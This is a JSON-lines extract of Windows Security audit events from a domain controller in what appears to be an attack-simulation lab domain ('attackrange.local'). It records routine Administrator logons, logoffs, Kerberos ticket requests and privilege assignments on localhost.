{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220527,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6DB65\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6db65","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220528,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6D893\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6d893","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220529,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7B959\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7b959","LogonType":"3","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220530,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220531,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220532,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220533,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BABB\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7babb","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220534,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BABB\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7babb","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220535,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220536,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220537,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220538,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BDC8\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{70897293-F183-D2AE-6E93-8504A0F51657}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7bdc8","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{70897293-F183-D2AE-6E93-8504A0F51657}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220539,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7BDC8\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7bdc8","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220540,"ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
